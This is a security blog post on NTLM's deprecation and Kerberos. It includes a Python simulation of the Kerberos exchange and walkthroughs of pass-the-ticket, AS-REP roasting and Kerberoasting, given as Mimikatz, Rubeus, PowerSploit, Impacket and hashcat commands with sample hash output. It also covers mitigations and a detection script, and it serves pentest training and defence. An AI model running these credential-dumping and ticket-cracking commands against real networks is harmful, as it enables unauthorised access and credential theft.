In the ever-changing landscape of network security, it is important to stay up to date with the latest protocols and technologies. One significant shift in this domain is the deprecation of the NTLM (NT LAN Manager) protocol. In 2024 it is important to understand this change, and more importantly what NTLM is, why it is no longer favoured, and what you should focus on next, if you want to stay ahead of the crowd as a cybersecurity professional. In this blog, we'll walk through the history of NTLM, its inner workings and inherent flaws, and the shift towards more secure alternatives like Kerberos. Lastly we'll also cover the top three attacks on Kerberos and how to perform these tests to audit and secure an Active Directory (AD) network.
What’s NTLM
NTLM (NT LAN Manager) is a suite of Microsoft security protocols designed to provide authentication, integrity, and confidentiality to users in a network.
How does NTLM work?
If I had to sum up how NTLM operates in a single sentence, it would be this: NTLM verifies a user's or computer's identity on the network through a challenge-response exchange during authentication.
If all this terminology goes over your head, have a look at the short diagram below and it will make much more sense. (Credits)
How NTLM Worked
As discussed earlier in the blog, NTLM authentication uses a challenge-response mechanism to verify a user's identity without sending the password over the network. Here's a simplified breakdown:
- User Logon: The user enters their credentials (username and password) on their device, which initiates the authentication process.
- Challenge: The server sends a challenge (a random number) to the user’s device.
- Response: The user’s device encrypts this challenge using the user’s password hash and sends it back to the server.
- Verification: The server, which has a copy of the user's password hash, performs the same encryption on the challenge and compares it to the response received. If they match, authentication succeeds; otherwise it fails.
This might not cover every technical detail of how NTLM works, but it should suffice for anyone to understand the basics. Earlier we mentioned that NTLM is a flawed protocol; let's dive into why it is no longer recommended.
Where NTLM is Flawed
Despite its long-standing use, NTLM has several critical vulnerabilities, such as:
Weak Encryption: NTLM relies on outdated cryptographic algorithms that are susceptible to brute-force attacks.
- NTLMv1 uses MD4 for hashing passwords. MD4 is susceptible to collision attacks, where different inputs can result in the same hash value.
- NTLMv1 uses DES (Data Encryption Standard) to encrypt the challenge and response. DES relies on a 56-bit key, which is very short for a key and is vulnerable to attacks like brute force.
Replay Attacks: NTLM does not use any form of session binding, which makes it vulnerable to replay attacks. As the name suggests, this attack involves capturing a valid authentication token and then reusing (replaying) it to gain unauthorised access. Note that this method does not alter the captured data in any way; the attacker simply resends it to impersonate a legitimate user.
NTLM Relay Attacks: Here too the attacker intercepts the authentication request, but instead of reusing it, forwards (relays) the request to another server. In a nutshell the attacker acts as a man-in-the-middle and abuses the intercepted authentication to log in to a different server, gaining unauthorised access to it.
The key difference is that a replay attack reuses the captured authentication as-is, while a relay attack captures the authentication and uses it elsewhere (against a different server).
Practically speaking, there is little point in attacking a dead snake, and in our case the dead snake is NTLM. But in case you ever come across a network that still supports NTLM and wish to audit or pentest it, check out the two-hour NTLM relaying workshop by SANS. It includes a 41 GB lab and covers a plethora of NTLM relaying attacks. Note that these attacks are not stealthy, but they get the job done. See the following links to attend the workshop.
The workshop
Workshop Notes and references
Lab Download
Pass-the-Hash Attacks: Attackers can capture hashed passwords and use them to authenticate as the user, bypassing the need for the plaintext password.
Lack of Mutual Authentication: NTLM does not provide server authentication to the client, leaving users vulnerable to man-in-the-middle attacks.
Given these vulnerabilities, NTLM is clearly being phased out in favor of more secure alternatives like Kerberos and the Negotiate protocol (Negotiate simply switches between NTLM and Kerberos depending on the circumstances). So for the rest of this blog we will focus on the Kerberos protocol.
Moving Forward: Focus on Kerberos
With NTLM deprecated, let's shift our focus from the dead snake to the soaring eagle: Kerberos, which is supposed to be a more secure authentication protocol (only if we implement it properly).
Working of the Kerberos Authentication Protocol
There are slight variations in the descriptions of the authentication flow found on the internet; some describe it as a six-step process, and even those descriptions differ slightly from one another. For our purposes, let's summarize the inner workings of Kerberos broadly into three phases.
Initial Authentication: When the user first logs in, the Authentication Server (AS) receives the user's credentials. Once the credentials are confirmed against the database, the AS issues a Ticket-Granting Ticket (TGT).
Ticket Granting: The user presents the TGT to the Ticket Granting Server (TGS) to obtain a Service Ticket (ST) for the desired service.
Accessing Services: With the service ticket, the user can access the desired service on the network.
Suggested reading: Kerberos for the busy Admin
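To make the three phases concrete, here is an added Python simulation of the exchange (my own example, not code from the original post or from any Kerberos implementation). It models a KDC that acts as both AS and TGS, a client, and a service, and it uses a toy authenticated-encryption helper (SHA-256 keystream plus HMAC tag) in place of a real Kerberos encryption type; the realm, principal names and passwords are constructed. Two properties worth noticing, because the attacks later in this post depend on them: the pre-authentication check is an encrypted timestamp that the KDC refuses to skip for accounts that require it, and the service ticket is sealed with the service account's own key, so only that key can open it.

```python
import hashlib
import hmac
import json
import os
import time
from typing import Optional

CLOCK_SKEW = 300        # seconds; a KDC rejects pre-auth timestamps outside the allowed skew
TICKET_LIFETIME = 600   # seconds; short for the demo, real TGTs default to 10 hours


def derive_key(password: str) -> bytes:
    """Toy stand-in for the Kerberos string-to-key function (real AES etypes use PBKDF2 with a salt)."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def seal(key: bytes, payload: dict) -> bytes:
    """Toy authenticated encryption (keystream XOR + HMAC tag); stands in for a Kerberos etype."""
    plaintext = json.dumps(payload, sort_keys=True).encode("utf-8")
    nonce = os.urandom(16)
    body = nonce + bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return body + hmac.new(key, body, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    """Checks the tag first, so a wrong key raises ValueError instead of yielding garbage."""
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed: wrong key or tampered message")
    nonce, ciphertext = body[:16], body[16:]
    return json.loads(bytes(c ^ k for c, k in zip(ciphertext, _keystream(key, nonce, len(ciphertext)))))


class KDC:
    """Authentication Server (AS) and Ticket Granting Server (TGS) of one realm."""

    def __init__(self, principals: dict, preauth_required: set):
        self.keys = {name: derive_key(pw) for name, pw in principals.items()}
        self.preauth_required = preauth_required

    def as_exchange(self, user: str, preauth: Optional[bytes] = None):
        """Step 1 (AS-REQ/AS-REP): TGT sealed with the krbtgt key, client part sealed with the user's key."""
        if user not in self.keys:
            raise PermissionError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        if user in self.preauth_required:
            if preauth is None:
                raise PermissionError("KDC_ERR_PREAUTH_REQUIRED")
            stamp = unseal(self.keys[user], preauth)["timestamp"]  # wrong password -> ValueError
            if abs(time.time() - stamp) > CLOCK_SKEW:
                raise PermissionError("KDC_ERR_PREAUTH_FAILED")
        session = os.urandom(16).hex()
        tgt = seal(self.keys["krbtgt"], {"client": user, "session": session, "expires": time.time() + TICKET_LIFETIME})
        return tgt, seal(self.keys[user], {"session": session})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, spn: str):
        """Step 2 (TGS-REQ/TGS-REP): the service ticket is sealed with the service account's own key."""
        t = unseal(self.keys["krbtgt"], tgt)
        if time.time() > t["expires"]:
            raise PermissionError("KRB_AP_ERR_TKT_EXPIRED")
        session = bytes.fromhex(t["session"])
        if unseal(session, authenticator)["client"] != t["client"]:  # caller must hold the TGT session key
            raise PermissionError("KRB_AP_ERR_BADMATCH")
        svc_session = os.urandom(16).hex()
        ticket = seal(self.keys[spn], {"client": t["client"], "session": svc_session, "expires": time.time() + TICKET_LIFETIME})
        return ticket, seal(session, {"session": svc_session})


def service_accept(service_key: bytes, ticket: bytes, authenticator: bytes) -> str:
    """Step 3 (AP-REQ): the service validates the ticket with nothing but its own key."""
    t = unseal(service_key, ticket)
    if time.time() > t["expires"] or unseal(bytes.fromhex(t["session"]), authenticator)["client"] != t["client"]:
        raise PermissionError("KRB_AP_ERR_BADMATCH")
    return t["client"]


def kerberos_logon(kdc: KDC, user: str, password: str, spn: str, service_key: bytes) -> str:
    """Client side of all three steps; returns the identity the service accepted."""
    user_key = derive_key(password)
    preauth = seal(user_key, {"timestamp": time.time()})  # PA-ENC-TIMESTAMP
    tgt, as_rep = kdc.as_exchange(user, preauth)
    session = bytes.fromhex(unseal(user_key, as_rep)["session"])
    ticket, tgs_rep = kdc.tgs_exchange(tgt, seal(session, {"client": user}), spn)
    svc_session = bytes.fromhex(unseal(session, tgs_rep)["session"])
    return service_accept(service_key, ticket, seal(svc_session, {"client": user}))


def demo() -> str:
    # Constructed realm: hypothetical principals and passwords, not from any real environment.
    principals = {"krbtgt": "long-random-krbtgt-secret", "alice": "Alice-Pass-2024!", "svc_sql": "Svc-Sql-Pass-2024!"}
    kdc = KDC(principals, preauth_required={"alice"})
    return kerberos_logon(kdc, "alice", "Alice-Pass-2024!", "svc_sql", derive_key(principals["svc_sql"]))


if __name__ == "__main__":
    print(demo())  # alice
```

Running the file walks alice through all three phases against the simulated KDC and prints the name the service accepted. Calling `kdc.as_exchange("alice")` with no pre-auth raises `KDC_ERR_PREAUTH_REQUIRED`, which is exactly the check an account with "Do not require Kerberos preauthentication" set would be missing.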
Top 3 Attacks on Kerberos and How to Perform These Tests
While Kerberos is more secure than NTLM, it comes with its own set of vulnerabilities. Here are the top three attacks on Kerberos you should be aware of when it comes to Kerberos authentication.
Now some of you might be thinking of attacks like brute-forcing Kerberos, but note that when good Active Directory Group Policies are enforced, such attacks are likely to be ineffective. If you still want to learn how to brute-force a Kerberos environment, check out this blog.
First let's start with enumeration on the AD network and then move on to the three exploitation techniques.
0. Enumeration
In a Windows environment, the setspn command is a powerful tool for enumerating SPNs (service principal names).
setspn -T [Domain] -Q */*
PowerShell-based tools like PowerView also offer convenient ways to enumerate SPNs:
Get-DomainUser -SPN | Select SamAccountName,DisplayName,ServicePrincipalName
1. Pass-the-Ticket Attack
Overview: In this attack, attackers capture and reuse Kerberos tickets to authenticate as (impersonate) the user without needing their credentials. It is as simple as the definition: if we have valid Kerberos tickets, we can use them to authenticate to the server.
Performing a Pass-the-Ticket Attack using Mimikatz
- Capture Tickets: Use a tool like Mimikatz to extract Kerberos tickets (TGT and TGS) from a compromised machine to which you have access.
Before using Mimikatz we first need to elevate privileges:
mimikatz.exe
privilege::debug
token::elevate
Now, using Mimikatz, we can perform the pass-the-ticket attack:
mimikatz.exe "sekurlsa::tickets /export"
mimikatz.exe "kerberos::ptt <ticket>"
- Reuse Tickets: Load the captured tickets into your session to gain access to network resources.
kerberos::ptt [ticket.kirbi]
Performing a Pass-the-Ticket Attack using Rubeus
.\Rubeus.exe asktgt /user:<username> /rc4:<hash> /domain:<domain> /dc:<domain_controller>
.\Rubeus.exe ptt /ticket:<ticket>
Mitigation:
1. Setting Ticket Lifetime Policy
You can use the following PowerShell command to limit the maximum lifetime of Kerberos tickets.
Set-ADObject -Identity "CN=<PolicyName>,CN=Policies,CN=System,DC=<domain>" -Replace @{"maxTicketAge"="<time>"}
2. Enable AES encryption for Kerberos
Set-ADObject -Identity "CN=Kerberos,CN=Security,CN=Configuration,DC=<domain>" -Replace @{"msDS-SupportedEncryptionTypes"="28"}
3. Monitor for suspicious Windows events, for example using Advanced Threat Analytics.
You can read the full detailed guide here.
2. AS-REP Roasting
Overview: AS-REP Roasting takes advantage of Active Directory user accounts that have the option "Do not require Kerberos preauthentication" enabled. The name should sound familiar: the attack targets the AS-REP step of Kerberos authentication.
Performing AS-REP Roasting with Rubeus:
Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\Kerbhashes.txt
This command instructs Rubeus to AS-REP roast every domain user that has pre-authentication disabled and write the resulting hashes to a file.
Additionally, you can leverage the PowerShell cmdlet Invoke-Rubeus for the same purpose:
Invoke-Rubeus -Command "asreproast /format:hashcat /outfile:C:\Temp\Kerbhashes.txt"
Cracking the Hashes:
Once you have gathered the hashed credentials, you can crack them using tools like Hashcat. Note that the AS-REP (etype 23) format is Hashcat mode 18200; mode 13100 is the TGS-REP format used for Kerberoasting later in this blog.
hashcat -m 18200 -a 0 -O hashes.txt rockyou.txt -r rules.rule
Mitigation:
Enforce Preauthentication: This practice alone reduces the chances of AS-REP roasting. (Reference)
Set up a strong password policy: Again, this should be a no-brainer; check out the references.
Monitoring and Alerting: Use security solutions to monitor for suspicious activity related to AS-REP Roasting and set up alerts, which helps you proactively detect and respond to these attacks.
Identifying Vulnerable Accounts: Using the following PowerShell command you can list all user accounts that have pre-authentication disabled, which means they are vulnerable to AS-REP roasting.
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
3. Kerberoasting
Overview: Attackers forge Kerberos Service Tickets (TGS) to gain unauthorised access to specific services.
Now let's look at the top 5 widely used tools for Kerberoasting and how to perform it with each of them.
1. Rubeus: The Swiss Army Knife for Kerberos
Rubeus is a versatile tool (written in C#) that provides a plethora of functionality for interacting with Kerberos, from harvesting tickets to performing Kerberoasting attacks.
Harvesting TGTs every x seconds:
rubeus.exe harvest /interval:30
Basic Kerberoasting:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local
TGT Delegation Trick:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /tgtdeleg
Roasting AES-Enabled Accounts:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /aes
Roasting with Alternate Credentials:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /creduser:ignite.local\Administrator /credpassword:Ignite@987
2. PowerSploit: Invoke-Kerberoast
This tool (part of the PowerSploit framework) is handy for enumerating all user accounts with non-null service principal names (SPNs) and extracts ticket information for further analysis or cracking.
Enumerate Kerberoastable Accounts:
Invoke-Kerberoast | fl
Specify Domain for Enumeration:
Invoke-Kerberoast -Domain dev.testlab.local | fl
Securely Convert String to Password Object:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
3. BloodHound or SharpHound: Mapping Kerberos Trust Relationships
BloodHound (with its SharpHound data collector) is an invaluable tool for visualizing and understanding Kerberos trust relationships within Active Directory environments.
4. Impacket: Kerberoasting Made Easy
Impacket simplifies Kerberoasting with its GetUserSPNs.py script, which lets attackers dump the Kerberos hashes of kerberoastable accounts remotely.
Impacket Installation:
cd /opt
wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/Impacket-0.9.19.tar.gz
tar -xvf Impacket-0.9.19.tar.gz
cd Impacket-0.9.19
sudo pip install .
Kerberoasting with Impacket:
cd /usr/share/doc/python3-impacket/examples/
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request
Cracking the extracted hashes:
hashcat -m 13100 -a 0 hash.txt Pass.txt
5. SharpRoast: Legacy Kerberoasting Tool
Although deprecated in favor of Rubeus, SharpRoast remains a notable Kerberoasting tool. By enumerating service principal names (SPNs) and extracting Kerberos hashes, SharpRoast helps identify vulnerable accounts for further exploitation.
- Enumerate and Extract Hashes for All Kerberoastable Accounts:
C:\Temp>SharpRoast.exe all
SamAccountName : winad10
DistinguishedName : CN=winad10,CN=Users,DC=lab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$lab.local$asdf/asdfasdf*$14AA4F...
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/lab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/lab.local*$99D1...
Mitigation:
Restrict Access to the KRBTGT Account: Protect the KRBTGT account with a secure password, as this account is essential for the creation of Kerberos ticket-granting tickets.
Proper Governance for Service Accounts: Regularly review and update service account privileges.
Note: If you wish to dive into the technicalities of the various Windows events and IOC hunting for both Kerberoasting and AS-REP roasting from the defender's point of view, it is highly suggested that you read this blog.
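As an added illustration of that defender's point of view (my own example, not code from the original post or from any product), the following Python script runs two simple hunts over a handful of constructed Windows Security events: 4768 "A Kerberos authentication ticket (TGT) was requested" with Pre-Authentication Type 0, which means the KDC issued an AS-REP without pre-authentication (the same accounts the Get-ADUser filter in the AS-REP mitigation section lists), and a burst of 4769 "A Kerberos service ticket was requested" events where one requester asks for RC4 (encryption type 0x17) tickets to many distinct service accounts in a short window, which is the pattern a Kerberoasting sweep leaves. The event dicts, account names and addresses are constructed sample data, and the threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC; AES128/AES256 appear as 0x11/0x12

# Constructed sample events (not real logs). Each dict carries only the fields from
# Security events 4768 (TGT requested) and 4769 (service ticket requested) that the hunts use.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TimeCreated": "2024-06-01T09:00:00", "TargetUserName": "alice",
     "IpAddress": "10.0.0.12", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "TimeCreated": "2024-06-01T09:00:03", "TargetUserName": "svc_legacy",
     "IpAddress": "10.0.0.99", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:00", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:04", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:09", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:13", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "svc_report", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:17", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "svc_ldapsync", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:20", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:01:25", "TargetUserName": "bob@LAB.LOCAL",
     "IpAddress": "10.0.0.99", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TimeCreated": "2024-06-01T09:05:00", "TargetUserName": "alice@LAB.LOCAL",
     "IpAddress": "10.0.0.12", "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},
]


def find_asrep_roast_candidates(events):
    """4768 with PreAuthType 0: the KDC returned an AS-REP (encrypted with the account's key)
    without the requester proving knowledge of the password first."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"})


def find_kerberoast_bursts(events, min_services=5, window=timedelta(minutes=5)):
    """One requester asking RC4 (0x17) service tickets for many distinct service accounts
    inside a short window. Machine accounts (name ending in $) and krbtgt are skipped as noise."""
    per_user = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        if e["ServiceName"].endswith("$") or e["ServiceName"].lower() == "krbtgt":
            continue
        per_user[e["TargetUserName"]].append((datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    findings = {}
    for user, requests in per_user.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):           # sliding window from each request
            services = {svc for ts, svc in requests[i:] if ts - start <= window}
            if len(services) >= min_services:
                findings[user] = sorted(services)
                break
    return findings


def triage(events):
    """Both hunts in one call; returns a dict a SIEM rule or report could consume."""
    return {"asrep_roast_candidates": find_asrep_roast_candidates(events),
            "kerberoast_bursts": find_kerberoast_bursts(events)}


if __name__ == "__main__":
    for name, result in triage(SAMPLE_EVENTS).items():
        print(f"{name}: {result}")
```

On the sample data the first hunt reports svc_legacy and the second reports bob@LAB.LOCAL with the five service accounts requested inside the window; the machine account and krbtgt requests are ignored, and alice's single AES request never trips the threshold. In a real environment the RC4 filter is what keeps the noise down, which is one more reason the AES-only mitigations above matter.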
Conclusion
As we transition to more secure authentication methods such as Kerberos, it is critical to understand its potential weaknesses and the various pentest techniques related to it. By being aware of typical attacks on Kerberos, such as Pass-the-Ticket, AS-REP roasting, and Kerberoasting, you can strengthen your network security and defend your network better.
Embrace the shift, learn more about Kerberos, and maintain your advantage in the rapidly changing cybersecurity industry. NTLM is dead; long live Kerberos!